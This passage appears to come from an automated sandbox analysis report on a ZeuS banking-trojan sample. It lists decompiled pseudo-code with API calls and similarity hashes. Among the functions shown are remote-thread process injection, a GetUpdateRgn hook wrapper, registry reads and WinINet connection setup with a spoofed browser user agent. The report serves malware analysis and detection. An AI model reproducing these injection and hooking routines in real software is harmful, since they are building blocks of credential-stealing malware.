								// the whole file must arrive in one ReadFile (&_a4 is reused as the bytes-read out-parameter);
								// a failed or short read releases the buffer and fails
								if(ReadFile(__esi[2], _t23, __esi[1],  &_a4, 0) == 0 || _a4 != __esi[1]) {
									VirtualFree( *_t33, 0, 0x8000); // MEM_RELEASE
									goto L10;
								} else {
									goto L5;
								}
							}
						} else {
							 *__esi = 0;
							L5:
							_t20 = 1;
						}
					}
				}
				return _t20;
			}

APIs
  • CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,0041D18D,?,?,00000000), ref: 0040A427
  • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0041D18D,?,?,00000000), ref: 0040A43A
  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,0041D18D,?,?,00000000), ref: 0040A462
  • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0041D18D,?,?,00000000), ref: 0040A47A
  • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,0041D18D,?,?,00000000), ref: 0040A494
  • CloseHandle.KERNEL32(?,?,?,?,?,0041D18D,?,?,00000000), ref: 0040A49D
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
  • String ID:
  • API String ID: 1974014688-0
  • Opcode ID: 4052ee2f780a7bd919cbd2b078e2e408700851ea0fcb83b52b19f83f5baaf78f
  • Instruction ID: 193709cf1db975cb980c074224cdb74986ae2a2de4d3f91ada3513172f2f9dd5
  • Opcode Fuzzy Hash: 4052ee2f780a7bd919cbd2b078e2e408700851ea0fcb83b52b19f83f5baaf78f
  • Instruction Fuzzy Hash: 7C11B279100300BFDB218F61CC4DE6B7BB8EB55750B10893EF596E61A0E7B4A951CB29
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 92%
			E00417860(struct HWND__* _a4, struct HRGN__* _a8, int _a12) {
				void* _t21;
				int _t22;
				signed int _t23;
				struct HWND__* _t27;
				char* _t31;

				_t27 = _a4;
				if(( *0x4239b0 & 0x00000004) == 0 || E0041CAA4() == 0) {
					L7:
					return GetUpdateRgn(_t27, _a8, _a12);
				} else {
					_t31 = TlsGetValue( *0x42323c);
					if(_t31 == 0 || _t27 !=  *((intOrPtr*)(_t31 + 4))) {
						goto L7;
					} else {
						SetRectRgn(_a8,  *(_t31 + 0xc),  *(_t31 + 0x10),  *(_t31 + 0x14),  *(_t31 + 0x18));
						if(_a12 != 0) {
							_t22 = SaveDC( *(_t31 + 8));
							_t23 = SendMessageW(_t27, 0x14,  *(_t31 + 8), 0);
							asm("sbb eax, eax");
							 *((intOrPtr*)(_t31 + 0x1c)) =  ~_t23 + 1;
							RestoreDC( *(_t31 + 8), _t22);
						}
						 *_t31 = 1;
						_t21 = 2;
						return _t21;
					}
				}
			}

APIs
  • GetUpdateRgn.USER32 ref: 004178E8
    • Part of subcall function 0041CAA4: WaitForSingleObject.KERNEL32(00000000,0041BE2C,?,19367402,00000001), ref: 0041CAAC
  • TlsGetValue.KERNEL32 ref: 00417880
  • SetRectRgn.GDI32(?,?,?,?,?), ref: 004178A0
  • SaveDC.GDI32(?), ref: 004178B0
  • SendMessageW.USER32(?,00000014,?,00000000), ref: 004178C0
  • RestoreDC.GDI32(?,00000000), ref: 004178D2
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
  • String ID:
  • API String ID: 3142230470-0
  • Opcode ID: 015894a628da38b99424145dd5176a317cd0f21fb19e9e48b3953106d61aa2d9
  • Instruction ID: 8a0d6ee86921e324627b39020cb799e34fa996f6a4f56197cb50163597b89cf5
  • Opcode Fuzzy Hash: 015894a628da38b99424145dd5176a317cd0f21fb19e9e48b3953106d61aa2d9
  • Instruction Fuzzy Hash: 91119A31104344EFCB326F61ED48F96BBB5FF08310F00492AFA8691571C7359490EB58
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%
			E00404F6E(void* __ecx, long _a4, intOrPtr _a8) {
				char _v5;
				void* __edi;
				void* __esi;
				void* _t10;
				void* _t14;
				void* _t23;
				void* _t25;
				void* _t26;

				_t21 = __ecx;
				_push(__ecx);
				_v5 = 0;
				_t23 = OpenProcess(0x47a, 0, _a4);
				_t28 = _t23;
				if(_t23 != 0) {
					_push(_t25);
					_t10 = E0041C9B9(_t21, _t23, _t25, _t28, _a8, 0);
					_t26 = _t10;
					if(_t26 != 0) {
						_t14 = CreateRemoteThread(_t23, 0, 0, _t10 -  *0x4239c4 + E0041D160, 0, 0, 0);
						_a4 = _t14;
						if(_t14 == 0) {
							VirtualFreeEx(_t23, _t26, 0, 0x8000);
						} else {
							WaitForSingleObject(_t14, 0x2710);
							CloseHandle(_a4);
							_v5 = 1;
						}
					}
					CloseHandle(_t23);
				}
				return _v5;
			}

APIs
  • OpenProcess.KERNEL32(0000047A,00000000,74B5F560,00000000,74B5F560,?,?,00405126,?,?,00000000,?,74B5F560,00000000), ref: 00404F82
  • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-00840B24,00000000,00000000,00000000), ref: 00404FB0
  • WaitForSingleObject.KERNEL32(00000000,00002710,?,00405126,?,?,00000000,?,74B5F560,00000000), ref: 00404FC3
  • CloseHandle.KERNEL32(74B5F560,?,00405126,?,?,00000000,?,74B5F560,00000000), ref: 00404FCC
  • VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,00405126,?,?,00000000,?,74B5F560,00000000), ref: 00404FE0
  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00405126,?,?,00000000,?,74B5F560,00000000), ref: 00404FE7
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: CloseHandle$CreateFreeObjectOpenProcessRemoteSingleThreadVirtualWait
  • String ID:
  • API String ID: 14861764-0
  • Opcode ID: 832df6abfea4818286aa590ce4bc2ddcec98d1f934cb695f356d6e545c872562
  • Instruction ID: 475ea5b1eac5786bedd7b618cd2d995553b83b3e234b8fa5846e74d6fec6ef34
  • Opcode Fuzzy Hash: 832df6abfea4818286aa590ce4bc2ddcec98d1f934cb695f356d6e545c872562
  • Instruction Fuzzy Hash: 66019EB6508149BFEB112B759CCCEBF3E6CEB89395B044079F601F21A0C6794D459678
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 99%
			E00411752(void* __edx, intOrPtr _a4) {
				signed int _v12;
				int _v16;
				void* _v20;
				int _v24;
				signed int _v28;
				int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v74;
				intOrPtr _v78;
				char _v80;
				struct _SYSTEMTIME _v96;
				char _v112;
				short _v184;
				short _v288;
				void* __ebx;
				void* __esi;
				signed int _t127;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t140;
				signed int _t142;
				signed int _t143;
				signed int _t151;
				signed int _t155;
				signed int _t159;
				signed char _t163;
				signed int _t167;
				signed int _t176;
				signed int _t177;
				signed int _t186;
				long _t191;
				long _t195;
				signed int _t201;
				void* _t202;
				signed int _t203;
				signed int _t208;
				signed int _t211;
				signed int _t212;
				signed int _t219;
				short* _t230;
				signed int _t238;
				intOrPtr _t239;
				void* _t244;

				_t239 = _a4;
				_t126 =  *((intOrPtr*)(_t239 + 0x40));
				if( *((intOrPtr*)(_t239 + 0x40)) != 0) {
					_t127 = E0040AD5E( &_v12, __edx, __eflags, _t126, 0x4e27, 0x10000000);
					 *(_t239 + 0x3c) =  *(_t239 + 0x3c) & 0x00000000;
					 *(_t239 + 0x38) =  *(_t239 + 0x38) & 0x00000000;
					_t238 = _t127;
					_v64 = _t238;
					__eflags = _t238;
					if(_t238 == 0) {
						L55:
						E004051E6(_v64);
						__eflags = 0 -  *(_t239 + 0x3c);
						asm("sbb eax, eax");
						return  ~0x00000000;
					}
					_t131 = _v12;
					__eflags = _t131 - 0x10;
					if(_t131 <= 0x10) {
						goto L55;
					}
					__eflags =  *((char*)(_t239 + 0x18)) - 1;
					_v16 = 1;
					_t132 = _t131 + _t238;
					__eflags = _t132;
					_v28 = ((0 |  *((char*)(_t239 + 0x18)) != 0x00000001) - 0x00000001 & 0xffffffe0) + 0x00000040 & 0x0000ffff;
					_v12 = _t132;
					while(1) {
						_t133 =  *(_t238 + 2) & 0x0000ffff;
						__eflags = _t133 - 0x10;
						if(_t133 < 0x10) {
							goto L55;
						}
						_t219 =  *(_t238 + 4) & 0x0000ffff;
						__eflags = _t219 - _t133;
						if(_t219 >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 6) - _t133;
						if( *(_t238 + 6) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 8) - _t133;
						if( *(_t238 + 8) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 0xa) - _t133;
						if( *(_t238 + 0xa) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 0xc) - _t133;
						if( *(_t238 + 0xc) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 0xe) - _t133;
						if( *(_t238 + 0xe) >= _t133) {
							goto L55;
						}
						_t134 =  *_t238 & 0x0000ffff;
						_t208 = _t134 >> 0x00000009 & 0x00000008;
						_t220 = _t238 + _t219;
						__eflags = (_t134 & _v28) - _v28;
						if((_t134 & _v28) != _v28) {
							L48:
							_t238 = _t238 + ( *(_t238 + 2) & 0x0000ffff);
							_t102 = _t238 + 0x10; // 0x10
							__eflags = _t102 - _v12;
							if(_t102 > _v12) {
								goto L55;
							}
							__eflags = ( *(_t238 + 2) & 0x0000ffff) + _t238 - _v12;
							if(( *(_t238 + 2) & 0x0000ffff) + _t238 > _v12) {
								goto L55;
							}
							_v16 = _v16 + 1;
							continue;
						}
						_t234 = _t208;
						_t140 = E0041142F(_t220, _t208,  *((intOrPtr*)(_t239 + 8)),  *((intOrPtr*)(_t239 + 0xc)));
						__eflags = _t140;
						if(_t140 == 0) {
							goto L48;
						}
						_t141 =  *(_t239 + 0x44);
						__eflags =  *(_t239 + 0x44);
						if(__eflags == 0) {
							L16:
							_t142 =  *(_t238 + 8) & 0x0000ffff;
							__eflags = _t142;
							if(_t142 == 0) {
								L18:
								_t143 =  *(_t238 + 0xa) & 0x0000ffff;
								__eflags = _t143;
								if(_t143 == 0) {
									L20:
									__eflags =  *_t238 & 0x00000010;
									if(( *_t238 & 0x00000010) == 0) {
										L31:
										E00405299( &_v60,  &_v60, 0, 0x1c);
										_v60 =  *_t238 & 0x0000ffff;
										_t209 = _t208 | 0xffffffff;
										_v56 = E00405644(_t208 | 0xffffffff, ( *(_t238 + 4) & 0x0000ffff) + _t238);
										_t151 =  *(_t238 + 6) & 0x0000ffff;
										__eflags = _t151;
										if(_t151 != 0) {
											__eflags = _t151 + _t238;
											_v52 = E00405644(_t209, _t151 + _t238);
										} else {
											_v52 = _v52 & 0x00000000;
										}
										_t155 =  *(_t238 + 0xc) & 0x0000ffff;
										__eflags = _t155;
										if(_t155 != 0) {
											__eflags = _t155 + _t238;
											_v48 = E00405644(_t209, _t155 + _t238);
										} else {
											_v48 = _v48 & 0x00000000;
										}
										_t159 =  *(_t238 + 0xe) & 0x0000ffff;
										__eflags = _t159;
										if(_t159 != 0) {
											__eflags = _t159 + _t238;
											_v44 = E00405644(_t209, _t159 + _t238);
										} else {
											_v44 = _v44 & 0x00000000;
										}
										_t163 =  *_t238 & 0x0000ffff;
										__eflags = _t163 & 0x00000003;
										if((_t163 & 0x00000003) != 0) {
											E00412692( *(_t239 + 0x3c),  *(_t239 + 0x38));
											 *(_t239 + 0x3c) =  *(_t239 + 0x3c) & 0x00000000;
											_t167 = E00405239(__eflags,  &_v60, 0x1c);
											 *(_t239 + 0x38) = _t167;
											__eflags = _t167;
											if(_t167 == 0) {
												E00412669( &_v60);
												_t239 = _a4;
											} else {
												 *(_t239 + 0x3c) =  *(_t239 + 0x3c) + 1;
											}
											goto L55;
										} else {
											__eflags = _t163 & 0x0000000c;
											if(__eflags == 0) {
												E00412669( &_v60);
												L47:
												_t239 = _a4;
												goto L48;
											}
											_t211 = E0040AD5E( &_v36, _t234, __eflags,  *((intOrPtr*)(_t239 + 0x40)), _v16, 0x40000000);
											_v40 = _t211;
											__eflags = _t211;
											if(_t211 == 0) {
												L54:
												E004051E6(_t211);
												E00412669( &_v60);
												_t239 = _a4;
												E00412692( *(_t239 + 0x3c),  *((intOrPtr*)(_a4 + 0x38)));
												_t122 = _t239 + 0x3c;
												 *_t122 =  *(_t239 + 0x3c) & 0x00000000;
												__eflags =  *_t122;
												goto L55;
											}
											_t176 = E0040B430(_t211, _v36);
											__eflags = _t176;
											if(_t176 == 0) {
												goto L54;
											}
											_t177 = E00405171(( *(_t239 + 0x3c) + 1) * 0x1c, _t239 + 0x38);
											__eflags = _t177;
											if(_t177 == 0) {
												goto L54;
											}
											 *(_a4 + 0x3c) =  *(_a4 + 0x3c) + 1;
											E00405222( *(_a4 + 0x3c) * 0x1c +  *((intOrPtr*)(_t178 + 0x38)),  &_v60, 0x1c);
											goto L47;
										}
									}
									__eflags =  *(_t238 + 0xc);
									if( *(_t238 + 0xc) <= 0) {
										goto L31;
									}
									E0041CD2B( &_v184, _t220, 1,  &_v288);
									_t186 = E0040648B( &_v112, ( *(_t238 + 0xc) & 0x0000ffff) + _t238, E00405D23(( *(_t238 + 0xc) & 0x0000ffff) + _t238));
									__eflags = _t186;
									if(_t186 == 0) {
										goto L48;
									}
									_t230 =  &_v184;
									_t212 = 0;
									__eflags = 0;
									do {
										E0040554E( *((intOrPtr*)(_t244 + _t212 - 0x6c)), _t230);
										_t212 = _t212 + 1;
										_t230 = _t230 + 4;
										__eflags = _t212 - 0x10;
									} while (_t212 < 0x10);
									_v32 = _v32 | 0xffffffff;
									_t208 = 0x10;
									 *_t230 = 0;
									_v24 = _t208;
									_v20 = 0x80000001;
									_t191 = RegOpenKeyExW(0x80000001,  &_v288, 0, 1,  &_v20);
									__eflags = _t191;
									if(_t191 != 0) {
										goto L31;
									}
									_t195 = RegQueryValueExW(_v20,  &_v184, 0, 0,  &_v80,  &_v24);
									__eflags = _t195;
									if(_t195 == 0) {
										_v32 = _v24;
									}
									RegCloseKey(_v20);
									__eflags = _v32 - _t208;
									if(_v32 == _t208) {
										GetLocalTime( &_v96);
										__eflags = _v74 - _v96.wDay;
										if(_v74 != _v96.wDay) {
											goto L31;
										}
										__eflags = _v78 - _v96.wMonth;
										if(_v78 == _v96.wMonth) {
											goto L48;
										}
									}
									goto L31;
								}
								_t220 = _t238 + _t143;
								_t201 = E00411464(_t238 + _t143,  *((intOrPtr*)(_t239 + 0x24)),  *((intOrPtr*)(_t239 + 0x28)));
								__eflags = _t201;
								if(_t201 == 0) {
									goto L48;
								}
								goto L20;
							}
							_t220 = _t238 + _t142;
							_t202 = E00411464(_t238 + _t142,  *((intOrPtr*)(_t239 + 0x24)),  *((intOrPtr*)(_t239 + 0x28)));
							__eflags = _t202 - 1;
							if(_t202 == 1) {
								goto L48;
							}
							goto L18;
						}
						_t203 = E004116EA(_t220, _t234, __eflags, 4, _t141,  *((intOrPtr*)(_t239 + 8)),  *((intOrPtr*)(_t239 + 0xc)), _t208);
						__eflags = _t203;
						if(_t203 != 0) {
							goto L48;
						}
						goto L16;
					}
					goto L55;
				}
				return 0;
			}

Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID:
  • String ID: Q!A
  • API String ID: 0-528218480
  • Opcode ID: e221c2becc118f0350062a7159fecb7109ef5b40dbcfb767155ed548372cc5f7
  • Instruction ID: 713d8404cf675d592991f2974253f77bd6a94d27dbd093bef97545ad52147c96
  • Opcode Fuzzy Hash: e221c2becc118f0350062a7159fecb7109ef5b40dbcfb767155ed548372cc5f7
  • Instruction Fuzzy Hash: 36B1B171900609AADF10EF95C881BFEBBB5FF04344F40452BFA51A66A1E778A9C1CB58
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 67%
			E0041C086(void* _a4, WCHAR* _a8) {
				char _v40;
				char _v160;
				char _v680;
				void* __edi;
				void* __esi;
				void** _t11;
				void* _t13;
				void* _t16;
				void* _t18;
				void* _t23;
				void* _t28;
				void* _t30;
				WCHAR* _t34;

				_t11 =  &_a4;
				_t28 = 0;
				__imp__ConvertSidToStringSidW(_a4, _t11);
				if(_t11 != 0) {
					_t37 =  &_v160;
					_t13 = 4;
					E0040F34A(_t13,  &_v160);
					_push(_a4);
					_t34 =  &_v680;
					_t16 = E00405ED9(_t37, 0x104, _t34, _t37);
					_pop(_t30);
					if(_t16 > 0) {
						_t18 = 5;
						E0040F34A(_t18,  &_v40);
						_t23 = E0040930A(0x80000002, _t30, _t34, _t34,  &_v40, 0x104);
						if(_t23 != 0 && _t23 != 0xffffffff) {
							PathUnquoteSpacesW(_t34);
							ExpandEnvironmentStringsW(_t34, _a8, 0x104);
							asm("sbb bl, bl");
							_t28 = 1;
						}
					}
					LocalFree(_a4);
				}
				return _t28;
			}

APIs
  • ConvertSidToStringSidW.ADVAPI32(?,?), ref: 0041C099
  • LocalFree.KERNEL32(?,.exe,00000000), ref: 0041C121
    • Part of subcall function 0040930A: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041C0F5,?,?,00000104,.exe,00000000), ref: 0040931F
  • PathUnquoteSpacesW.SHLWAPI(?,?,?,00000104,.exe,00000000), ref: 0041C101
  • ExpandEnvironmentStringsW.KERNEL32(?,0040C9C8,00000104), ref: 0041C10E
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: ConvertEnvironmentExpandFreeLocalOpenPathSpacesStringStringsUnquote
  • String ID: .exe
  • API String ID: 2200435814-4119554291
  • Opcode ID: 14a15fd33eee4f45c73627c565362af2645708ba34c01fb8064f5876fa03c7e2
  • Instruction ID: a729619f4423994d1209396ef62e371aefd833b587cd2e4ded0b0aeaecac43ad
  • Opcode Fuzzy Hash: 14a15fd33eee4f45c73627c565362af2645708ba34c01fb8064f5876fa03c7e2
  • Instruction Fuzzy Hash: D011A3716801147BDB206B79DD49ECB3BADDF49360F100036F945E71A2D738D948CBA4
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00406DBA(signed int __eax, char* __ecx) {
				short _v28;
				char* _v32;
				signed int _t5;
				void* _t12;
				void* _t14;
				char* _t15;
				void* _t18;

				_t15 = __ecx;
				_t5 = __eax;
				if(__ecx == 0) {
					_t15 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)";
				}
				_t14 = InternetOpenA(_t15,  !_t5 & 0x00000001, 0, 0, 0);
				if(_t14 == 0) {
					L7:
					return 0;
				}
				_t18 = 0;
				do {
					_t1 = _t18 + 0x422394; // 0x422394
					_t2 = _t18 + 0x422390; // 0x2
					InternetSetOptionA(_t14,  *_t2, _t1, 4);
					_t18 = _t18 + 8;
				} while (_t18 < 0x18);
				_t12 = InternetConnectA(_t14, _v32, _v28, 0, 0, 3, 0, 0);
				if(_t12 == 0) {
					InternetCloseHandle(_t14);
					goto L7;
				}
				return _t12;
			}

APIs
  • InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 00406DD1
  • InternetSetOptionA.WININET(00000000,00000002,00422394,00000004), ref: 00406DF0
  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406E0D
  • InternetCloseHandle.WININET(00000000), ref: 00406E19
Strings
  • Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1), xrefs: 00406DC2, 00406DD0
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Internet$CloseConnectHandleOpenOption
  • String ID: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
  • API String ID: 910987326-3737944857
  • Opcode ID: 57dabc19f3743528ed3bf9e38b1874f99336e9ad2a3f22947d7599881aa23f03
  • Instruction ID: 104acf2318a2c1de783130ca48f64a6fdd92c4eb16af169abbf69d0e5035e856
  • Opcode Fuzzy Hash: 57dabc19f3743528ed3bf9e38b1874f99336e9ad2a3f22947d7599881aa23f03
  • Instruction Fuzzy Hash: 88F0F6722002107AD72257718C8CD6B7D6DEBCA761B05083DF647F5160C5358860C77C
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0040D74C(void* __edx) {
				long _v8;
				char _v116;
				void _v220;
				void* __esi;
				void* _t8;
				void* _t12;
				void* _t18;

				_t18 = __edx;
				_t8 = GetThreadDesktop(GetCurrentThreadId());
				if(_t8 != 0) {
					_t8 = GetUserObjectInformationW(_t8, 2,  &_v220, 0x64,  &_v8);
					if(_t8 != 0 && _v8 == 0x4e) {
						E0041C946(0x2937498d,  &_v116, 0);
						_t8 = E00405257( &_v116,  &_v220, 0x4c);
						if(_t8 == 0) {
							_t12 = E0040D35A( &_v220, _t18, 0x423238, _t8);
							if(_t12 == 0) {
								return E0040D5C5(0x423238, 0);
							}
							 *0x4239b0 =  *0x4239b0 | 0x00000004;
							return _t12;
						}
					}
				}
				return _t8;
			}

APIs
  • GetCurrentThreadId.KERNEL32 ref: 0040D756
  • GetThreadDesktop.USER32(00000000), ref: 0040D75D
  • GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,0041C50A), ref: 0040D777
    • Part of subcall function 0040D35A: TlsAlloc.KERNEL32(00423238,00000000,0000018C,00000000,00000000), ref: 0040D373
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Thread$AllocCurrentDesktopInformationObjectUser
  • String ID: 82B$N
  • API String ID: 454308152-516153583
  • Opcode ID: f9c437e52553a3991fcd26ee11e77d435c291a48d2c2a83acdecce5b9b1653be
  • Instruction ID: 6e7f2f08a23886c0ae38c79b8d7c30d657d9da291addb003bc5e3897857841e8
  • Opcode Fuzzy Hash: f9c437e52553a3991fcd26ee11e77d435c291a48d2c2a83acdecce5b9b1653be
  • Instruction Fuzzy Hash: C801A770D10215AEEB10ABE0DD46FAB367CAB00748F00007EB605B71D1EB789A0DCA6E
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 54%
			E0040722E() {
				char _v8;
				struct HINSTANCE__* _v12;
				void* _v1036;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t15;
				char _t22;
				void* _t28;

				_t22 = 0;
				_t13 = LoadLibraryA("urlmon.dll");
				_v12 = _t13;
				if(_t13 != 0) {
					_t15 = GetProcAddress(_t13, "ObtainUserAgentString");
					if(_t15 != 0) {
						_push( &_v8);
						_push( &_v1036);
						_push(0);
						_v8 = 0x3ff;
						_v1036 = 0;
						if( *_t15() == 0) {
							if(_v8 > 0x3ff) {
								_v8 = 0x3ff;
							}
							 *((char*)(_t28 + _v8 - 0x408)) = _t22;
							_t22 = E00405644( &_v1036 | 0xffffffff,  &_v1036);
						}
					}
					FreeLibrary(_v12);
				}
				return _t22;
			}

APIs
  • LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 0040723F
  • GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00407252
  • FreeLibrary.KERNEL32(?), ref: 004072A4
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Library$AddressFreeLoadProc
  • String ID: ObtainUserAgentString$urlmon.dll
  • API String ID: 145871493-2685262326
  • Opcode ID: 40cf98ebd64b1ecbcb738f233a27fdfa92c11e5e8691efe9f67e7f2ef9490a0e
  • Instruction ID: 2b433a8b03aa3d484467e336033286d55d5276299d6334b3ab5159da996dee9b
  • Opcode Fuzzy Hash: 40cf98ebd64b1ecbcb738f233a27fdfa92c11e5e8691efe9f67e7f2ef9490a0e
  • Instruction Fuzzy Hash: D40171B1D04258BBCB509BE89D855DE7BB8AB04340F2005FEB655F3290DA389F448A69
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E004163B8(intOrPtr _a4, intOrPtr _a12) {
				void* __esi;
				void* _t6;
				signed int _t7;

				if(_a12 == 0x64 || _a12 == 0x33) {
					EnterCriticalSection(0x423420);
					_t7 = E00415D7F(_a4);
					if(_t7 != 0xffffffff) {
						_t7 = SetEvent( *(_t7 * 0x24 +  *0x423438 + 4));
					}
					LeaveCriticalSection(0x423420);
					return _t7;
				}
				return _t6;
			}

APIs
  • EnterCriticalSection.KERNEL32(00423420), ref: 004163CE
  • SetEvent.KERNEL32(?), ref: 004163EF
  • LeaveCriticalSection.KERNEL32(00423420), ref: 004163F6
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: CriticalSection$EnterEventLeave
  • String ID: 4B$3
  • API String ID: 3094578987-1166831345
  • Opcode ID: e5f4af89493170819fe0cd47ec46aac9746dab06f549c6dee930b1ede170d669
  • Instruction ID: 4f38a9cf12bd69e0c80c397ca9cf9bd98304455763abbb6d53c5bbefd3dd37e1
  • Opcode Fuzzy Hash: e5f4af89493170819fe0cd47ec46aac9746dab06f549c6dee930b1ede170d669
  • Instruction Fuzzy Hash: FEE06D31104100EBC721AB25A94889AB764EA96336B01C1BEF425A21B0CB38D8928A2A
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 95%
			E00414A27(char* __ecx, void* __eflags) {
				int _v8;
				void* _v12;
				signed int _v16;
				char* _v20;
				intOrPtr _v24;
				int _v28;
				intOrPtr _v32;
				char _v36;
				void* _v40;
				intOrPtr _v44;
				char* _v48;
				char _v60;
				char _v80;
				char _v100;
				char _v120;
				char _v152;
				char _v216;
				char _v284;
				short _v804;
				void* __edi;
				void* __esi;
				intOrPtr _t70;
				int _t102;
				int _t110;
				int _t114;
				void* _t115;
				signed int _t117;
				void* _t119;
				intOrPtr _t121;
				void* _t124;
				intOrPtr _t127;
				int _t134;
				intOrPtr _t136;
				char* _t138;
				char* _t141;
				signed int _t145;
				void* _t146;
				void* _t147;

				_t129 = __ecx;
				_t70 = E004051B6(0xc08);
				_t127 = _t70;
				_t134 = 0;
				_v24 = _t127;
				if(_t127 == 0) {
